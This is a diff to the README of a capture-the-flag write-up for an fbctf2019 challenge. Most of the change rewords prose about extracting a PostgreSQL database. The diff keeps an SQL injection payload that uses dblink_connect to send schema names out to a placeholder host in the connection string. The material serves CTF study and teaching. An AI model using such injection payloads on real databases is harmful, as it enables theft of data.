PDKT-Team/ctf/fbctf2019/hr-admin-module/README.md

     0x0050:  0068 656c 6c6f 6672 6f6d 6662 0000       .hellofromfb.
 ```

-Then, we can proceed to exfiltrate the database using some PostgreSQL queries.
-Note that for any query result that contains whitespaces, we need to convert the result to hex/base64 with `encode` function or replace the whitespace to other character with `replace` function because it will causes execution error in `dblink_connect`.
+Then, we can continue to extract the database using several PostgreSQL queries.
+Note that for each query result that contains whitespaces, we need to convert the result to hex/base64 with `encode` function or replace the whitespace to other character with `replace` function because it will cause an execution error during `dblink_connect` process.

-Get the list of schema:
+Get a list of schemas:

 ```
 asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(schema_name,':') FROM information_schema.schemata) || ' password=postgres dbname=postgres')) --